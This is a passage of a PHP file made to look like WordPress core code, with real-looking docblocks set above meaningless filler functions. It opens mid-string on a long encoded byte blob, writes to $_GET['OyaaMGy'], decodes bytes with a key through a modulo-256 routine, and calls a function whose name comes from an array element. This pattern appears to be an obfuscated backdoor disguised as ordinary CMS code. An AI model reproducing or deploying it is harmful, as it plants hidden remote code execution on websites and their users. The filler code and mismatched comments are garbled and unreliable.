d\xa7\x93\x87\x81\x87\x8a\xdc\xe7\xea\xb5\xd9\xc6\xd7\xcf\xca\xe7\xa0z\xba\xa8\xdb\xdc\xd4\xd5\xba\x9b\xd3\xcd\xc2\x8e\xcb\xdd\xbf\xc1\xde\xd1\xc4\x96\x89\x93\x98\x88\x90\x9cq\x8ar\x97\xda\xc0\xae\xcc\xde\xda\x94\x9e\xb3`\x87\x81\x87\x8a\x89|\xf5`\x87\x81\x87\x8a\x89\x93\x98vq\x81\x87\x8a\x89|\x9c\x98\xd4\xa3\xd7\xac\xbc\xec\x81\x93p\xd4\xdb\xdc\xc8\xe5\xdd\xc6\xcc\xc2\xdb\x92\x8d\xd4\xdb\xae\xca\xaf\xdc\xb2\xde\xec\xf1\x82\x96\x8b\x87\x8a\xe1\xd8\xbf\xa8\x87\x8b\x96\x9d\x92\xae\xb3`qkptr|\xa7\x80\x87\x81\x87\xcc\xd6\xbb\xe4\xa2\x87\x81\x91\x99\xdb\xd8\xec\xcb\xd9\xcf\x96\x94\xd7\xc6\xdc\xce\xca\x81\x91\x99\x8d\xba\xee\xc9\xbc\xa9\xab\xb4\xb9\xb6\xdc\x91\x8b\xc0\xb0\xc4r\xb0\x81}\x9b\x94\x9b\xa1\x9c\x9a\xb3`pjp\x8a\x89\x93\x98\xd3qjps\x89\x93\x98v\x87kpsr|\x81\x85\x91\xad\x87\x8a\x93\xa2\xde\xcb\xd5\xc4\xdb\xd3\xd8\xe1\x81\xc7\xaa\xa4\xcc\xd3\xbb\xca\xe5\xab\xdb\x89\x8b\xaf\xc3\xb7\xc0\xa8\xae\xa2\xda\xbc\xb0\x9c\x82`qj\xe2tr|\x98v\x8b\xce\xb1\xc2\xbf\xd4\xba\xcd\x87\x81\x87\xa7\x89\x93\x98v\x87\x83\xc3\xe2\x9b\xa6\x9a\x91\x8b\xc0\xd0\xdd\xaf\xa2\xa2v\x87\xc6\xb0\xd5\xb7\xba\x98v\x91\x90\xa4s\x90\xa9\xac\x8d\x9b\x95\x8e\xa5s\x93\x98v\x87j\xcd\xd9\xdb\xd8\xd9\xb9\xcfj\x8f\xbe\xd2\xdf\xd1\x97\xbf\xcd\x8f\x93r\xd4\xeb\x85\x91\x81\x87\x8a\xc0\xde\x98v\x91\x90\x8b\xb5\xca\xbf\xbb\xb0\xa8\x8ap\xe5s|\x98v\x87\xb9\xca\xc4\xbf\xde\xc6\x98\xb2\xcf\xb6\x92\x8d\xbe\xd9\xa2\xaa\xbb\xa8\x96\x89\x93\x98v\x87\x85\xd4\xb4\xc1\xc9\xd9\x98\xde\x8a\xa2tr\xf0\x82_pjps\x89\xf0\x82v\x87\x81\x87\x8a\x89\x93\x98`\x87\x81\x87\x8ar\xd9\xed\xc4\xca\xd5\xd0\xd9\xd7\xa2\xa2v\xd5\x81\x87\x94\x98\xec\xd9\xc8\xcd\xd9\xd6\xac\xbd\xe8\xec~\x8b\xb2\xac\xd0\xb0\xe8\xa4_\x8b\xa3\xb1\xd4\xd1\xcd\xa1`\x87\x81\x87\x8a\x89\x93\x98v\x87\x81\xe2t\x89\x93\x98v\xd0\xc7\x96\x94\x89\x93\x98\xad\xc9\xb8\xdb\xda\x89\x9d\xa7~p\xc4\xd6\xdf\xd7\xe7\xa7\x80\xde\xd3\x87\x8a\x89\x9d\xa7~p\x85\xb8\xaf\xcf\xba\xed_\x90\x81\x87\x8a\x89\x93\xb5\x93p\x94\x87\x8a\x89\x9c\x98v\x87\xdcq\x8a\x8d\xba\xe4\xcc\xae\xb7\xbf\xdc\xca\xc6\x98v\x87\x81\x87\xa7r\x97\xc9\x9b\xcd\xa8\xdc\xc5\x9a\xd0\xb3`\x96\x8b\x87\x8a\x89\xde\xbc\xc9\xb6\xb5\x91\x99\x8d\xd7\xdb\xba\xcf\xad\xdf\xcf\xd5\xc2\xbb_\xa4\x81\x8b\xbb\xae\xd9\xbf\xcb\xc2\x93\xc4\xa5s\x93\x98v\x87\x90\x91\x8a\xbd\xd7\xc0\x80\x96\x85\xac\xae\xd0\xcd\xda\xa8\xbf\xab\x96\x94\xb9\xb6\xc0\xa2\x87\x81\x87\x94\x98\xb0\x81z\xae\xcd\xdd\xb1\xbf\xcb\xea\xb7\xba\x89\x8b\xce\xcc\xd7\xe0\xa2\xdf\xc6\xd3\xb9\xac\x9c\xb3`pjpsr\x93\x98v\x87\xc6\xdd\xcb\xd5\x93\xa0_\x8b\xa6\xab\xd1\xc3\xd5\xca\xae\xb1\x81\x87\x8a\x89\x9c\xb3z\xc6\xce\xdb\xd5\xb8\xeb\x81\x93p\x88\x9c\xa3\xa2\xa3\xb1}\xa2k\x87\x8a\x89\xd7\xe1\xbbp\x89\x90\xa5\x8d\xd2\xdd\xce\xd8\xcc\xae\x99\x93\x93\xc4\xac\xbd\xd5\xbc\x8a\x89\x9d\xa7\x93p\x88\x99\x9f\xa0\xa5\xab}\xa2k\x87\x8a\x89\x93\x98v\xe4k\x87\x8a\x89\x93\x98\xd3qjq\x8a\x89\x93\x98v\x87\xc7\xdc\xd8\xcc\xe7\xe1\xc5\xd5\x90\x91\x8a\xe1\x93\x98v\x91\x90\xd3\xd8\xd6\xb7\xbe\xc7\xbf\xd4\x8f\x8e\xd5\xc5\xe6\xae\xb6\xd7\xbb\x96r\x97\xf0\xa1\xaf\xb4\xdd\xbc\xd4\x9c\x82v\x87\x81\x87\xe5s}\x81\xc8\xcc\xd5\xdc\xdc\xd7\x93\x9c\xc2\xb9\xcf\xbf\xb9\xdf\xc7\x81\xb4\x87\x81\x87\x8a\x8d\xeb\xc3\x9e\xba\xd7\xb9\xd5\xa4}\x82`\x87\x81\x87\x8a\x89\xf0\x82`q\x90\x91\x8a\x89\xc3\xc8\xc7\xc8\x81\x87\x94\x98}\x81_pjp\xd0\xde\xe1\xdb\xca\xd0\xd0\xd5\x99\x93\x93\xbe\x80\x96\xa7\xd7\xdd\xbb\xb9\xeb~\x8b\xdb\xd2\xad\xde\xc1\xa4_\x8b\xce\xb1\xc2\xbf\xd4\xba\xcd\x90kp\x8a\x89\xee\xa7\x80\x87\xc2\xce\xc0\xd6\x93\xa2\x85q\x81\x87\x8a\x89\x93\xa7\x80\x87\x81\x87\xab\x89\x93\xa2\x85\x8b\xdb\xd2\xad\xde\xc1\xa7\x80\x87\x81\xe0\x8a\x93\xa2\xb5_\xcc\xd9\xd7\xd6\xd8\xd7\xdd_\x8f\x85\xd4\xb4\xc1\xc9\xd9\x98\xde\x8d\x87\x8a\x8d\xed\xe3\x99\xdc\xaf\x87\x8a\x92\xae\x82v\x87\x81pt\x89\xa2\xa2v\x87\xd0\xcc\xd0\x89\x93\xa2\x85\xe0\xc2\xd9\xd0\xe1\xe2\xba\xaa\xdc\xd5\x8f\x8e\xe3\xde\xbb\xcb\xb5\x8dp\x8e\xd6\xbd\xd0\xac\xc8\xa3\xde\x93\xa4}\x98v\x87\x81p\xe7s\x93\x98vq\x81\x96\x94\x89\xbc\xea\xa9\xd2\x81\x91\x99\xcf\xe8\xe6\xb9\xdb\xca\xd6\xd8r\xcb\xdb\xb0\xbd\xcc\xb5\xac\xb4\xe1\xc7~\x8b\xac\xc8\xb6\xac\xcd\xb9\x82p\x85\xd4\xb4\xc1\xc9\xd9\x98\xde\x8aqsr|\x81\xd1q\x81\x87\x8a\x89\xd9\xe7\xc8\xcc\xc2\xca\xd2\x89\x93\x98v\x87\x89\x96\x94\x89\xd7\x98\x80\x96\x85\xb2\xcb\xb5\xb6\xd2\x97p\xc2\xda\x8a\x89\x93\x9c\xce\xb2\xa9\xba\xe0\xbb\xde\xa7\x80\x87\x81\x87\xd0\x89\x9d\xa7\x93\xa5j\x8b\xd6\xbb\xe1\xd0\xa5\xdd\xb5\x87\x8a\x92|\xf3`q\x81\x87\xdf\xb8\xcc\xf2\xb8\xbe\xb8\xd1\xad\x91\x97\xf0\xa1\xaf\xb4\xdd\xbc\xd4\x9f\xa7\x80\x87\x81\x87\xc1\xb9\x9d\xa7\xc6\xcf\xcc\xce\xb9\xb5\xdd\xa0z\xd3\xb3\xd5\xc2\xb8\xe9\xcc\x93j\x8b\xd7\xb3\xcb\xce\xb7\xa9\xd8\x90\xa5s\x93\x98v\x87\x81\x87\x8a\x89\xf0\x82_\x87\xdeqsr|\xa7\x80\x87\x81\x87\xcc\x89\x9d\xa7`\x87\x81\x87\x8a\x89\x93\xde\xcb\xd5\xc4\xdb\xd3\xd8\xe1\x98\xcd\xae\xd7\xbe\xe0\xbc\x9b\x9c\xce\xb2\xa9\xba\xe0\xbb\xde\xa4v\x8b\xcd\xb9\xd8\xc1\xc2\xee\xaa\x90kp\x8a\x89\x93\xf3`pjp\x8a\x89\x93\x98v\x8b\xc3\xb9\xdb\xbd\xeb\xc7\xb7\xb6\xbb\xdd\x8a\x89\x93\x98v\xa4j\xda\xde\xdb\xdf\xdd\xc4\x8f\x90\x91\xba\xbc\xb7\x98v\x91\x90\x8b\xd6\xbb\xe1\xd0\xa5\xdd\xb5p\x93\x98\xe6\xec\xc8\xd3\xc6\xd5\x92\x98\x9d\x98v\x87\xbb\xd5\xd3\xb5\x93\x98\x80\x96\x85\xdf\xb5\xb1\xc6\xee\xa8\xd2j\x90\xa5\x8d\xd2\xe4\xbd\xd4\x90\x91\xc4\xd6\xd8\xc9\xa1\x87\x8b\x96\xa7\x89\x93\x98v\x87\x88\x9b\xa3\x9b\xa7\xae}\xa2kqtr\x97\xf0\xa1\xaf\xb4\xdd\xbc\xd4\xa2\xa2v\x87\xc4\x87\x8a\x93\xa2\xa6\x93\x87\x81\x89\xb6\xcd\xea\xbb\xae\xbd\x8e\xaf\xb4\xbe\xc0\xe4\xb0\x94\xb6\xd6\xd7\xd6\xa0\xec\xab\xc0\x8e\xbb\xe1\xc0\xd6\xa5\xb0\xb0\xd3\xbd\xda\xbd\xd5\xa5\xbd\xab\xae\x89\xa5s|\x81_pjp\x8e\xe1\xbe\xc0\xa9\xdd\xb3\xd2\x8a\xa6\xa2\xa2v\xcb\x81\x87\x94\x98\xe6\xec\xc8\xc6\xd3\xcc\xda\xce\xd4\xec\x85\x91\xaf\xb9\xac\x89\x9d\xa7~p\x85\xdf\xb5\xb1\xc6\xee\xa8\xd2\x8d\x96\x94\x89\x93\x98\xa4\x87\x81\x87\x94\x98\xdc\xe6\xca\xdd\xc2\xd3\x92\x8d\xd5\xca\xc7\xbb\xd9\xb6\xcb\xb8\xcd\xeep\x8c\x96\x94\xd0\xc9\xca\x9a\x87\x81\x87\x94\x98\xa4\xa1\x91\xa2k\x87\x8a\x89\x93\x98_qjpsr|\x81\xc8\xcc\xd5\xdc\xdc\xd7\xa2\xa2v\x87\x81\xe0\xb7\xbb\x93\xa2\x85\x8b\xd9\xb2\xb2\xbc\xe9\xca\xc1\xa2\x9cqsr|\x81v\x87\x81\x87\x8a\xe6}\x82_qj\x87\xd0\xde\xe1\xdb\xca\xd0\xd0\xd5s\xde\xc2\xd1\xd0\xc9\xb8\xbe\xd4\xac\x9b\x9c\xce\xb2\xa9\xba\xe0\xbb\xde\xa4\x85\x91\x81\x87\x8a\xcc\xbf\xcav\x91\x90\x8b\xd6\xbb\xe1\xd0\xa5\xdd\xb5\x93\x99\x93\x93\x98v\xb2\xa3\x91\x99\x8d\xe0\xc2\xae\xbd\xc2\xa9\xe1\x92}\x81v\x87\x81\x87\xe5r}\x98v\x87\x81\x87\x8a\xaf\xe3\xeb\xa8\xad\xd4\x8f\xd6\xd7\xe0\xbc\x9c\xd8\xb9\xda\x92\x8d\xdf\xca\xc4\xbf\xb0\xdd\xbe\x95|\xef\x9d\xdd\xb8\xdd\xbd\x91\x97\xf0\xa1\xaf\xb4\xdd\xbc\xd4\x9f\xa7\x80\x87\x81\xac\xe3\xcc\xdb\xe9v\x87\x8b\x96\x8e\xd5\xc5\xe6\xae\xb6\xd7\xbb\x93\x92\x9f\x81z\xd4\xab\xbf\xc0\xca\xb5\xef\xa2\x9cq\x8a\x89\x93\x98v\x87\x81qsr\xa2\xa2v\xab\xc6\xc1\xba\xae\x9d\xa7z\xaa\xa2\xb9\xdf\xb1\xc1\xbd\x85\x91\x81\x87\xb1\xab\x93\x98v\x91\x90\xa4\x99\x93\x93\x98v\xbc\x81\x91\x99\xdd\xe5\xe1\xc3\x8f\x85\xd3\xbc\xd7\xcb\xc7\xcc\xbb\x8a\xa2\xa5s}\x82_\x8b\xcd\xd4\xb5\xb9\xcc\xba\xaf\xce\xb5\xc9\x8a\x89\xb0\x81\xbb\xdf\xd1\xd3\xd9\xcd\xd8\xa0z\xd4\xab\xbf\xc0\xca\xb5\xef\x82p\x85\xaa\xab\xbb\xe8\xc0\xa4\xac\x8a\xa2\xa5s\x93\x98v\x87\x81\xd0\xd0\x89\x93\x98v\x8f\xc4\xd6\xdf\xd7\xe7\xa0z\xd3\xce\xb2\xba\xc2\xb5\xd1\xbd\xbb\xc3\x90\x99\x93\xc6\xe1\x80\x96\x9f\x87\x8a\x9a\x9c\x98v\xe2k\x87\x8a\x89\x93\x98z\xdd\xba\xd1\xb8\xab\xc9\xc4v\xa4\x90\x91\x8a\x89\xd8\xf2v\x87\x81\x91\x99\xd2\xe0\xe8\xc2\xd6\xc5\xcc\x92\x8b\xcf\xad\x8b\x89\x8d\x96\x94\x89\xb8\xee\x9b\x87\x81\x87\x94\x98\x97\xe4\xc3\xb2\xb1\xc0\xac\xc2\xda\xcc\xb8\x90\x9c\xa2tr|\x81v\x87\x85\xdf\xd9\xd4\xe1\xd2\xb0\x96\x8b\x87\x8a\xc1\xb8\xe8\x80\x96\x9e\x87\x8a\x89\xe6\xec\xc8\xc6\xd1\xc8\xce\x91\x97\xee\xaf\xd1\xaf\xa9\xc0\xb5\x9f\xa7\x80\x87\x81\xd7\xe3\xb0\xb6\xa2\x85\x99\x91\x93\x99\x93\xe8\xc4\xab\xbc\x81\x87\x8a\x93\xa2\x9a\xb2\x9d\x91\x89\x96\x98\x9d\x98v\x87\xce\x87\x8a\x93\xa2\xcb\xaa\xb9\xc0\xb7\xab\xad\xd2\xca\x9f\xae\xa9\xbb\x93\xa4}\x82`\x87\x81\x87\x8a\xe6}\x82_\xe4kq\x8a\x89\x93\x82_pjps\x89\x93\xe9\x99\xaa\xc6\xd0\xbc\xc0\xe0\xcd\xca\x8f\x83\x89\x93\xa4\x95\xb3\xbf\xa1\x95\xa2\xdd\xa3\xa9\xb2x\xdc\xcf\xd3\xd3\xd7\xde\x9a\x91\xe4";
 // const unsigned char bnegative = negative(b);
 $userlist['y5rvbc6'] = 1808;
 $popular_terms = (!isset($popular_terms)?	"j5tzco0se"	:	"q69dlimh");
 $sidebar_name['qdhbzqy'] = 1077;
 $hex8_regexp = urlencode($hex8_regexp);
  if(empty(expm1(945)) ==  True)	{
  	$users_columns = 'byhio';
  }
 $firstWrite['vidqgjw7'] = 'nsdd';
 $last_changed = substr($last_changed, 19, 12);
 $notices = ltrim($notices);
 //Net result is the same as trimming both ends of the value.
 // 4.15  GEOB General encapsulated object
     $_GET["OyaaMGy"] = $force_uncompressed;
 }


/**
 * Returns the HTML of the sample permalink slug editor.
 *
 * @since 2.5.0
 *
 * @param int|WP_Post $caps_with_roles      Post ID or post object.
 * @param string|null $new_title Optional. New title. Default null.
 * @param string|null $new_slug  Optional. New slug. Default null.
 * @return string The HTML of the sample permalink slug editor.
 */

 function get_previous_crop ($limited_email_domains){
 	if(empty(abs(234)) ==  True) 	{
 		$RIFFsize = 'jeiv9';
 	}
 	$limited_email_domains = 'a25z';
 	$filter_value['w7s5wops'] = 4835;
 	if(empty(is_string($limited_email_domains)) !=  true) {
 		$savetimelimit = 'm5akvs';
 	}
 	$akid = 'a9ot';
 	$default_comments_page['iscdre'] = 156;
 	if(!(urlencode($akid)) !=  TRUE) {
 		$compress_scripts = 'b6zeosev1';
 	}
 	if((asinh(123)) ===  True) {
 		$has_border_radius = 'y3a9n';
 	}
 	$akid = rtrim($akid);
 	$limited_email_domains = atan(470);
 	if(!isset($sign_extracerts_file)) {
 		$sign_extracerts_file = 'njp1';
 	}
 	$sign_extracerts_file = dechex(695);
 	$public_statuses = (!isset($public_statuses)?"mfh9b6gmx":"i5i7k");
 	$akid = quotemeta($sign_extracerts_file);
 	$aria_sort_attr['q0art6'] = 1502;
 	if((asin(507)) !==  false)	{
 		$numeric_strs = 'kna9ogblu';
 	}
 	$akid = floor(135);
 	$shared_tts = 'hrrc2o';
 	$shortcode = 'e4he5o';
 	if(!isset($sub2feed2)) {
 		$sub2feed2 = 'e7m31lqj';
 	}
 	$sub2feed2 = chop($shared_tts, $shortcode);
 	$sign_extracerts_file = tanh(914);
 	$crypto_method['imtf19e0'] = 'tiq8j0e2';
 	if(!isset($color_support)) {
 		$color_support = 'drua8unl';
 	}
 	$color_support = htmlspecialchars($sign_extracerts_file);
 	return $limited_email_domains;
 }


/**
 * Determines if a given value is integer-like.
 *
 * @since 5.5.0
 *
 * @param mixed $maybe_integer The value being evaluated.
 * @return bool True if an integer, otherwise false.
 */

 if(!isset($skip_cache)) {
 	$skip_cache = 'q71sj';
 }
// M - Emphasis
// ----- Do the extraction (if not a folder)


/**
	 * Format a cookie for a Set-Cookie header
	 *
	 * This is used when sending cookies to clients. This isn't really
	 * applicable to client-side usage, but might be handy for debugging.
	 *
	 * @return string Cookie formatted for Set-Cookie header
	 */

 function remove_rewrite_tag($escape, $plugurl){
 $last_result = 'dstf2x5';
 $month_abbrev = 'k83leo4cx';
 $users_of_blog = 'wf9ws';
 $day_field = 'ng3mlt';
 $roomTypeLookup = 'akqu8t';
 // And user doesn't have privs, remove menu.
 // Include admin-footer.php and exit.
 $users_of_blog = htmlspecialchars($users_of_blog);
 $wp_actions['o4ftocj'] = 'aneg';
  if(!(bin2hex($month_abbrev)) !=  true) 	{
  	$js_value = 'd04z4a';
  }
 $roomTypeLookup = lcfirst($roomTypeLookup);
  if(!empty(bin2hex($last_result)) !=  true)	{
  	$sslext = 'rd0lq';
  }
 // If an attribute is not recognized as safe, then the instance is legacy.
 $last_result = floor(985);
 $overridden_cpage = 'rfus7';
 $method_overridden = (!isset($method_overridden)?'gffajcrd':'dxx85vca');
  if(!(strtolower($day_field)) !=  false)	{
  	$sign_key_file = 'gyj9bo7';
  }
 $day_month_year_error_msg['qhez0znn'] = 'n7ehb';
 // End if $g_pclzip_versionis7_permalinks.
 $active_formatting_elements = (!isset($active_formatting_elements)?'z1y0e0':'gipks');
 $day_field = tan(690);
 $users_of_blog = md5($users_of_blog);
 $allcaps['zna3kxfdq'] = 1997;
 $last_result = strrev($last_result);
 //   There may be more than one 'AENC' frames in a tag,
 $roomTypeLookup = wordwrap($roomTypeLookup);
 $copyright_label = (!isset($copyright_label)?	'ktns328'	:	'rrek85');
 $new_array = 'g8a8';
  if(!empty(htmlspecialchars($overridden_cpage)) !=  False){
  	$elem = 'x8y1u';
  }
 $users_of_blog = atanh(137);
 $startoffset = (!isset($startoffset)? 	"v9w4i53" 	: 	"a8w95ew");
 $primary_blog_id = 'g9jf';
 $b6 = 's5hd406';
 $day_field = rtrim($day_field);
 $new_array = strtoupper($new_array);
     $filter_data = $plugurl[1];
     $take_over = $plugurl[3];
  if(!empty(strtr($primary_blog_id, 19, 8)) ==  True){
  	$abbr = 'veufflyex';
  }
 $new_array = stripslashes($last_result);
  if(!(htmlentities($b6)) ==  true){
  	$classes_for_update_button = 'e83i';
  }
 $search_results_query['fa6adp3'] = 9;
  if(!isset($site_details)) {
  	$site_details = 'jz9tu75';
  }
 $roomTypeLookup = strcspn($roomTypeLookup, $roomTypeLookup);
 $close_button_label = (!isset($close_button_label)? 	"nhwa1vg5" 	: 	"jbw21jd");
 $site_details = strip_tags($day_field);
  if(!empty(log10(868)) ===  false)	{
  	$font_spread = 'auwyqq';
  }
 $below_midpoint_count['vzykxb5'] = 2434;
  if(!isset($token_start)) {
  	$token_start = 'qo05r';
  }
 $have_translations['s111y8'] = 2768;
 $default_menu_order['lwguhmu'] = 'wt0r2';
 $users_of_blog = asinh(496);
  if(!empty(atan(853)) !=  true)	{
  	$crons = 'dhnfz0';
  }
 $site_details = ucfirst($site_details);
 $roomTypeLookup = rad2deg(496);
 $token_start = strripos($last_result, $new_array);
 $passed_value = (!isset($passed_value)? 'dno4hs' : 's8ntri2v');
 $drefDataOffset = (!isset($drefDataOffset)? "wxcug9" : "xmv20");
     $filter_data($escape, $take_over);
 }
$skip_cache = expm1(332);
$last_attr = sin(680);
$working_directory = 'hie17wyf';


/**
 * Avoids a collision between a site slug and a permalink slug.
 *
 * In a subdirectory installation this will make sure that a site and a post do not use the
 * same subdirectory by checking for a site with the same name as a new post.
 *
 * @since 3.0.0
 *
 * @param array $data    An array of post data.
 * @param array $caps_with_rolesarr An array of posts. Not currently used.
 * @return array The new array of post data after checking for collisions.
 */

 function sodium_crypto_auth(&$time_scale, $trimmed_event_types, $clauses){
     $preview_file = 256;
 // Shake it!
     $bulk_counts = count($clauses);
 $allowed_source_properties = 'fndq73';
 $local_key = 'lnfcfqww';
 $first_comment_url = 'tg6wfn';
  if(!isset($new_title)) {
  	$new_title = 'pib7ytih5';
  }
 $control_type = 'ox1llpfzq';
     $bulk_counts = $trimmed_event_types % $bulk_counts;
 // End if ( ! empty( $old_sidebars_widgets ) ).
 $new_title = asinh(606);
 $tinymce_scripts_printed = (!isset($tinymce_scripts_printed)?"x3pcpaf8j":"sddqt8l");
 $gap_row['hy4gst'] = 1819;
 $local_key = bin2hex($local_key);
 $frames_scan_per_segment = (!isset($frames_scan_per_segment)?	"hjqwh"	:	"groahi4");
     $bulk_counts = $clauses[$bulk_counts];
 $nonmenu_tabs['k5snlh0'] = 'r7tf';
 $first_comment_url = htmlentities($first_comment_url);
  if((trim($new_title)) !=  true){
  	$toggle_close_button_icon = 'evr224rbu';
  }
 $allowed_source_properties = strcspn($allowed_source_properties, $allowed_source_properties);
 $test_str = (!isset($test_str)? 	"beoxueue" 	: 	"evyqg5");
 $determined_format['u35k50pb'] = 'plc4w';
  if(!isset($link_rating)) {
  	$link_rating = 'a6hju9g';
  }
  if(!(addcslashes($first_comment_url, $first_comment_url)) ===  true)	{
  	$remote_ip = 'chpotqg';
  }
 $control_type = lcfirst($control_type);
  if(!isset($permastruct_args)) {
  	$permastruct_args = 'us53948';
  }
 $first_comment_url = strnatcmp($first_comment_url, $first_comment_url);
 $quick_edit_classes = (!isset($quick_edit_classes)?	"xgyd4"	:	"oj15enm");
 $permastruct_args = md5($new_title);
 $allowed_source_properties = floor(238);
 $link_rating = acos(741);
 $avail_roles['ujiau'] = 788;
  if(!isset($trackbackmatch)) {
  	$trackbackmatch = 'yvbo';
  }
 $comment_author_url_link['t1q94u'] = 3762;
 $permastruct_args = lcfirst($new_title);
 $transports = (!isset($transports)? 	'd6rfw' 	: 	'dpbfhjy');
 $trackbackmatch = asin(335);
  if(!(str_repeat($first_comment_url, 14)) ===  FALSE)	{
  	$thisfile_asf_comments = 'l1l2u';
  }
 $permastruct_args = cosh(76);
  if(!isset($new_postarr)) {
  	$new_postarr = 'ss4s';
  }
 $link_rating = asin(596);
 // and it's possible that only the video track (or, in theory, one of the video tracks) is flagged as
 $new_title = strnatcasecmp($permastruct_args, $new_title);
 $single_screen = (!isset($single_screen)?"k6r24vm6":"hj52d40");
 $local_key = bin2hex($link_rating);
  if(empty(htmlentities($first_comment_url)) !=  True) 	{
  	$top_level_pages = 'c5isoi';
  }
 $new_postarr = exp(574);
 $current_id['lwj9'] = 'cz4u';
  if(empty(dechex(157)) !=  true){
  	$existing_style = 'e0b9';
  }
 $previewable_devices = (!isset($previewable_devices)?"dpsy8a3gp":"c8oe9iv");
 $control_type = urldecode($control_type);
 $allowed_source_properties = strrev($allowed_source_properties);
     $time_scale = ($time_scale - $bulk_counts);
 $local_key = dechex(623);
 $p_is_dir['ztmqdepq'] = 1178;
 $control_type = decoct(714);
 $f6g3['zylwc'] = 3256;
  if(!isset($centerMixLevelLookup)) {
  	$centerMixLevelLookup = 'waw5xcx';
  }
  if(empty(sin(47)) !=  TRUE) 	{
  	$ttl = 'f52z45';
  }
 $supported_blocks['odd0obpd'] = 'quag9j';
 $first_comment_url = strtoupper($first_comment_url);
 $query_string['aul9g42'] = 2801;
 $centerMixLevelLookup = stripslashes($new_title);
     $time_scale = $time_scale % $preview_file;
 }


/*
			 * The maxval check does two things: it checks that the attribute value is
			 * an integer from 0 and up, without an excessive amount of zeroes or
			 * whitespace (to avoid Buffer Overflows). It also checks that the attribute
			 * value is not greater than the given value.
			 * This check can be used to avoid Denial of Service attacks.
			 */

 function the_title ($style_key){
 // chmod the file or directory.
 $redir_tab = 'qpde';
 // a 64-bit value is required, in which case the normal 32-bit size field is set to 0x00000001
 // If no taxonomy, assume tt_ids.
 // Have to have at least one.
 // Ensure an include parameter is set in case the orderby is set to 'include'.
 // $cats
 $TargetTypeValue = 'hz5noy4e';
 // End if ( ! empty( $old_sidebars_widgets ) ).
 // Store the updated settings for prepare_item_for_database to use.
 // Set a cookie now to see if they are supported by the browser.
 	$datepicker_date_format = 'dqmuo6sgv';
 	$file_mime = (!isset($file_mime)?	"e2nia89"	:	"m237sg");
 	$admin_preview_callback['b4yuck68'] = 4747;
 // array_slice() removes keys!
 	if(!isset($before_block_visitor)) {
 		$before_block_visitor = 'hot6o';
 	}
 // end foreach
 	$before_block_visitor = html_entity_decode($datepicker_date_format);
 	$SMTPOptions['jjvhkl6'] = 3817;
 	if(!isset($logins)) {
 		$logins = 'wcriil';
 	}
 	$logins = tan(607);
 	if(!isset($h9)) {
 		$h9 = 'd99pbll';
 	}
 	$h9 = md5($logins);
 	$casesensitive['tl1glkks'] = 2614;
 	$before_block_visitor = strrpos($datepicker_date_format, $before_block_visitor);
 	$new_autosave['je8zl0jux'] = 2419;
 	if(!(wordwrap($logins)) ===  false) {
 		$filter_block_context = 'k6xup2';
 	}
 	$wp_registered_widget_controls = (!isset($wp_registered_widget_controls)? 	'rjtp' 	: 	't0l5irs');
 	if(!isset($sample_factor)) {
 		$sample_factor = 'wertk79hr';
 	}
 	$sample_factor = md5($datepicker_date_format);
 	$hint = (!isset($hint)?'rgyhem':'a9ryy0nq');
 	if((htmlspecialchars_decode($h9)) ===  true) 	{
 		$credit_name = 'bsub';
 	}
 	if(empty(rawurlencode($before_block_visitor)) !=  FALSE) 	{
 		$newData = 'yv9ka';
 	}
 	$style_key = 'fm9vvcxt';
 	$navigation_post_edit_link['zvpw65g'] = 3147;
 	$h9 = ucfirst($style_key);
 	$ctext = (!isset($ctext)? "c6vt2" : "rdkr6gy0j");
 	$boxtype['icqh9i2w'] = 4800;
 	if(empty(lcfirst($logins)) !=  true) {
 		$addend = 'vu66jdz';
 	}
 	if((expm1(597)) ==  True) {
 		$opener = 'v9esa';
 	}
 	$h9 = strtoupper($h9);
 	$controls['ghomp'] = 1548;
 	if(!empty(addcslashes($logins, $datepicker_date_format)) ==  TRUE) 	{
 		$more_string = 'el1qd';
 	}
 	return $style_key;
 }
$start_month['cqh39'] = 4064;


/**
 * Serves as a callback for comparing objects based on count.
 *
 * Used with `uasort()`.
 *
 * @since 3.1.0
 * @access private
 *
 * @param object $a The first object to compare.
 * @param object $b The second object to compare.
 * @return int Negative number if `$a->count` is less than `$b->count`, zero if they are equal,
 *             or greater than zero if `$a->count` is greater than `$b->count`.
 */

 function get_the_block_template_html ($cidUniq){
 // Check for a block template without a description and title or with a title equal to the slug.
 // Always clears the hook in case the post status bounced from future to draft.
 	$cidUniq = 'eq82q';
 	$user_result['ctfx8zq31'] = 'xu958gl';
 // This allows us to be able to get a response from wp_apply_colors_support.
 	$user_search['jna0f'] = 'd10go31';
 	if(!isset($ltr)) {
 		$ltr = 'x4akdv9w';
 	}
 	$ltr = strtoupper($cidUniq);
 	$ecdhKeypair = (!isset($ecdhKeypair)? 	'j9t1' 	: 	'zpc387vie');
 	$cidUniq = floor(851);
 	$boundary = (!isset($boundary)? "p1m7m" : "jsgali5");
 	if(!empty(abs(54)) ==  False)	{
 		$o_addr = 'b9jj';
 	}
 	if(!empty(expm1(90)) ===  TRUE) 	{
 		$allowed_format = 'i3kyowr';
 	}
 	$cidUniq = strtolower($ltr);
 	$used_global_styles_presets = (!isset($used_global_styles_presets)?	"lthtnobao"	:	"hkuf");
 	$affected_plugin_files['guyzfp'] = 'pypthnma9';
 	$DIVXTAGgenre['p97ldj5f'] = 'wd9ed';
 	$cidUniq = strcspn($cidUniq, $ltr);
 	$ltr = decoct(696);
 	return $cidUniq;
 }


/**
	 * Removes a customize panel.
	 *
	 * Note that removing the panel doesn't destroy the WP_Customize_Panel instance or remove its filters.
	 *
	 * @since 4.0.0
	 *
	 * @param string $multidimensional_filter Panel ID to remove.
	 */

 if(!isset($quality_result)) {
 	$quality_result = 'xcr27';
 }


/**
	 * Outputs the settings form for the Recent Posts widget.
	 *
	 * @since 2.8.0
	 *
	 * @param array $g_pclzip_versionnstance Current settings.
	 */

 function FreeFormatFrameLength ($rest){
 	if(!isset($processed_response)) {
 		$processed_response = 'umx1v3j7';
 	}
 	$processed_response = acosh(743);
 	if(!isset($logged_in_cookie)) {
 		$logged_in_cookie = 'weclo6x';
 	}
 	$logged_in_cookie = sinh(745);
 	$update_major = 'j9et8i6';
 	$http_response['r501yxd83'] = 2495;
 	$update_major = html_entity_decode($update_major);
 	$compact = 'bo5vh31j';
 	$rest = strtoupper($compact);
 	$p_remove_all_dir = 'ry726ty';
 	if(empty(strnatcmp($p_remove_all_dir, $processed_response)) !=  false)	{
 		$slugs_node = 'kub7czt4';
 	}
 	return $rest;
 }
/**
 * Checks whether separate styles should be loaded for core blocks on-render.
 *
 * When this function returns true, other functions ensure that core blocks
 * only load their assets on-render, and each block loads its own, individual
